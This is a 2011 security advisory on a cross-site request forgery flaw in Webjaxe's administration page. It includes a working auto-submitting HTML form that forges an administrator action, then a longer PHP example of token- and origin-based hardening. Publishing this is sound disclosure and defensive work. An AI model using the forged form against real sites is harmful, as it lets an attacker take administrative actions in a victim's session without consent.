High-Tech Bridge Security Advisory HTB22927
Published: Mar 29, 2011

Cross-site Request Forgery (CSRF) in Webjaxe

2011-03-29 00:00:00
High-Tech Bridge
www.htbridge.com

EPSS: 0.005 (Low), percentile 76.7%

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Webjaxe which could be exploited to perform cross-site request forgery (CSRF) attacks.

  1. Cross-site request forgery (CSRF) in Webjaxe
    The vulnerability exists due to insufficient validation of the request origin in php/partie_administrateur/administration.php: the script acts on any POST request that carries the administrator's session cookie, without an anti-CSRF token or an Origin/Referer check. A remote attacker can craft a web page that auto-submits such a request, trick a logged-in administrator into visiting it, and thereby perform administrative actions in that administrator's session, for example modify the administrator's credentials. The exploitation example below uses the ajouter_projet action to create a new project; any other action handled by administration.php can be forged the same way.
    Exploitation example (attacker-hosted HTML page; replace [host] with the target):
    <form action="http://[host]/php/partie_administrateur/administration.php" method="post" name="main" id="main">
    <input type="hidden" name="action" value="ajouter_projet">
    <input type="hidden" name="titre_projet" value="123123">
    <input type="hidden" name="ajouter" value="Add">
    <input type="hidden" name="submit" value="OK">
    <input type="submit" id="btn">
    </form>
    <script>
    // Submit the form as soon as the page loads; no user interaction is needed.
    document.getElementById('btn').click();
    </script>
    Preconditions: the victim must be authenticated to Webjaxe at the time, and the browser must attach the session cookie to the cross-site POST. Browsers that default cookies to SameSite=Lax do not send the cookie on a cross-site POST, so the forged request then arrives unauthenticated.
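    The fix the advisory implies is a server-side check that a forged page cannot satisfy. The following is an added illustration, not Webjaxe's own code: a hypothetical hardened handler for the ajouter_projet action of administration.php that requires a per-session anti-CSRF token, compared in constant time, and additionally rejects requests whose Origin (or Referer) does not match the site's own host. Function names, the csrf_token field name and the session layout are assumptions made for the example.

```php
<?php
// Added example: hardened handling of POST requests to administration.php.
// Not Webjaxe's code; names such as csrf_token() and same_origin() are assumed.
session_start();

// Issue one random token per session and render it into every admin form.
// A cross-site page cannot read it, so it cannot forge a valid POST.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    return $want !== '' && is_string($sent) && hash_equals($want, $sent);
}

// Defense in depth: the request must come from our own origin.
// Fail closed when neither Origin nor Referer is present.
function same_origin(array $server): bool
{
    $expected = $server['HTTP_HOST'] ?? '';
    $hdr = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($expected === '' || $hdr === null) {
        return false;
    }
    $host = parse_url($hdr, PHP_URL_HOST);
    $port = parse_url($hdr, PHP_URL_PORT);
    if ($host === null || $host === false) {
        return false;
    }
    // HTTP_HOST carries ":port" only for non-default ports; Origin does the same.
    $origin = $host . ($port !== null && $port !== false ? ':' . $port : '');
    return hash_equals($expected, $origin);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!same_origin($_SERVER) || !csrf_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid anti-CSRF token');
    }
    if (($_POST['action'] ?? '') === 'ajouter_projet') {
        $titre = trim((string) ($_POST['titre_projet'] ?? ''));
        // ajouter_projet($titre);  // the application's own project-creation logic
    }
}
?>
<!-- The legitimate form now carries the token the forged page cannot know. -->
<form action="administration.php" method="post">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="hidden" name="action" value="ajouter_projet">
  <input type="text" name="titre_projet">
  <input type="submit" name="ajouter" value="Add">
</form>
```

    With this in place the advisory's auto-submitting form is refused twice over: it carries no csrf_token, and its Origin is the attacker's host rather than [host]. Setting the session cookie with the SameSite attribute (session_set_cookie_params with 'samesite' => 'Lax' or 'Strict') is a third, browser-enforced layer, but the token remains the primary control because the attribute is only honoured by browsers that support it.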
Affected product (CPE): webjaxe, version <= 1.02

